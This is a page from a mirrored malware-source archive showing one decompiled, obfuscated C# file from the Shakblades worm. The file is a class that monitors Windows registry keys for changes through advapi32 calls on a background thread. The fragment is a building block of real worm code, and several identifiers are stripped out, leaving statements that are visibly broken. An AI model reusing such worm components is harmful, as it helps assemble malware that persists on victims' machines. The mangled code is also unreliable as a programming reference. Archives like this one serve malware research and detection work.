ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᘽƭ.cs

222 lines
7.3 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᘽƭ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
namespace Ҧ߲ʽ
{
public class ƭ : IDisposable
{
private const int \u1B7Eı = 1;
private const int \u0D58Ꮈ\u00AEႍ = 16;
private const int \u08D2ᰆ = 131072;
private static readonly IntPtr Օ\u0FC9ˡ = new IntPtr(int.MinValue);
private static readonly IntPtr ǹ\u05FFఔ = new IntPtr(-2147483647);
private static readonly IntPtr \u1C31᪱ࢢ = new IntPtr(-2147483646);
private static readonly IntPtr = new IntPtr(-2147483645);
private static readonly IntPtr \u139Fᙇ = new IntPtr(-2147483644);
private static readonly IntPtr yଳጻഷቝ = new IntPtr(-2147483643);
private static readonly IntPtr \u176D᧒ޢਕೆጾૐ = new IntPtr(-2147483642);
private IntPtr \u0029Ѽ\u09D1ᚻ\u08BFჶ;
private string ˣ;
private object ϒ\u0EDBไ\u0CC5ᒎ = new object();
private Thread ݍ\u0B98\u0FF8ρ;
private ManualResetEvent \u08F1ᤜᬯ = new ManualResetEvent(false);
private \u187Bȸº᭰\u09FC = \u187Bȸº᭰\u09FC.\u18ABٞ\u1C96ᦁྌᚳ | \u187Bȸº᭰\u09FC. | \u187Bȸº᭰\u09FC.\u000A | \u187Bȸº᭰\u09FC.\u0C11ᘾ;
public ƭ(RegistryKey registryKey) => this.\u05F8ᨅ᩵۷ኝ᭯(registryKey.Name);
public ƭ(string name) => this.\u05F8ᨅ᩵۷ኝ᭯(name);
public ƭ(RegistryHive registryHive, string subKey) => this.\u1A8Cˉၕᖁ\u001Eඹᶋ(registryHive, subKey);
[DllImport("advapi32.dll", EntryPoint = "RegOpenKeyEx", SetLastError = true)]
private static extern int זى\u0C70\u0DCE\u0DF4(
IntPtr _param0,
string _param1,
uint Çڔ,
int _param3,
out IntPtr _param4);
[DllImport("advapi32.dll", EntryPoint = "RegNotifyChangeKeyValue", SetLastError = true)]
private static extern int \u0731ᄦѧ\u08D2װ\u002Fᇣ(
IntPtr _param0,
bool _param1,
\u187Bȸº᭰\u09FC _param2,
IntPtr _param3,
bool _param4);
[DllImport("advapi32.dll", EntryPoint = "RegCloseKey", SetLastError = true)]
private static extern int \u0008Տ\u0DF9ទƕ\u02FD(IntPtr _param0);
public event EventHandler ŕ\u0AD4߭;
protected virtual void OnRegChanged()
{
EventHandler eventHandler = this.\u0BF1;
if (eventHandler == null)
return;
eventHandler((object) this, (EventArgs) null);
}
public event ErrorEventHandler ϦڢƘ;
protected virtual void OnError(Exception e)
{
}
public void Dispose()
{
this.\u191F();
GC.SuppressFinalize((object) this);
}
public \u187Bȸº᭰\u09FC ܜѕ֨
{
get => this.;
set
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
this. = value;
}
}
private void \u1A8Cˉၕᖁ\u001Eඹᶋ(RegistryHive ԭך, string )
{
switch (ԭך)
{
case RegistryHive.ClassesRoot:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.Օ\u0FC9ˡ;
break;
case RegistryHive.CurrentUser:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.ǹ\u05FFఔ;
break;
case RegistryHive.LocalMachine:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u1C31᪱ࢢ;
break;
case RegistryHive.Users:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.;
break;
case RegistryHive.PerformanceData:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u139Fᙇ;
break;
case RegistryHive.CurrentConfig:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.yଳጻഷቝ;
break;
case RegistryHive.DynData:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u176D᧒ޢਕೆጾૐ;
break;
}
this.ˣ = ;
}
private void \u05F8ᨅ᩵۷ኝ᭯(string _param1)
{
string[] strArray = _param1.Split('\\');
switch (strArray[0])
{
case "HKEY_CLASSES_ROOT":
case "HKCR":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.Օ\u0FC9ˡ;
break;
case "HKEY_CURRENT_USER":
case "HKCU":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.ǹ\u05FFఔ;
break;
case "HKEY_LOCAL_MACHINE":
case "HKLM":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.\u1C31᪱ࢢ;
break;
case "HKEY_USERS":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.;
break;
case "HKEY_CURRENT_CONFIG":
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = ƭ.yଳጻഷቝ;
break;
default:
this.\u0029Ѽ\u09D1ᚻ\u08BFჶ = IntPtr.Zero;
break;
}
this.ˣ = string.Join("\\", strArray, 1, strArray.Length - 1);
}
public bool \u008Dᆉܳ => this.ݍ\u0B98\u0FF8ρ != null;
public void ůߝ()
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
{
if (this.\u008Dᆉܳ)
return;
this.\u08F1ᤜᬯ.Reset();
this.ݍ\u0B98\u0FF8ρ = new Thread(new ThreadStart(this.\u0F02̢᠗Ôଚ᭗ɭ));
this.ݍ\u0B98\u0FF8ρ.IsBackground = true;
this.ݍ\u0B98\u0FF8ρ.Start();
}
}
public void \u191F()
{
lock (this.ϒ\u0EDBไ\u0CC5ᒎ)
{
Thread ݍρ = this.ݍ\u0B98\u0FF8ρ;
if (ݍρ == null)
return;
this.\u08F1ᤜᬯ.Set();
ݍρ.Join();
}
}
private void \u0F02̢᠗Ôଚ᭗ɭ()
{
try
{
this.ۺ\u05BE᭬ქ();
}
catch (Exception ex)
{
this.OnError(ex);
}
this.ݍ\u0B98\u0FF8ρ = (Thread) null;
}
private void ۺ\u05BE᭬ქ()
{
IntPtr num;
int error1 = ƭ.זى\u0C70\u0DCE\u0DF4(this.\u0029Ѽ\u09D1ᚻ\u08BFჶ, this.ˣ, 0U, 131089, out num);
if (error1 != 0)
throw new Win32Exception(error1);
try
{
AutoResetEvent autoResetEvent = new AutoResetEvent(false);
WaitHandle[] waitHandles = new WaitHandle[2]
{
(WaitHandle) autoResetEvent,
(WaitHandle) this.\u08F1ᤜᬯ
};
while (!this.\u08F1ᤜᬯ.WaitOne(0, true))
{
int error2 = ƭ.\u0731ᄦѧ\u08D2װ\u002Fᇣ(num, true, this., autoResetEvent.SafeWaitHandle.DangerousGetHandle(), true);
if (error2 != 0)
throw new Win32Exception(error2);
if (WaitHandle.WaitAny(waitHandles) == 0)
this.OnRegChanged();
}
}
finally
{
if (num != IntPtr.Zero)
ƭ.\u0008Տ\u0DF9ទƕ\u02FD(num);
}
}
}
}
Reference in New Issue Copy Permalink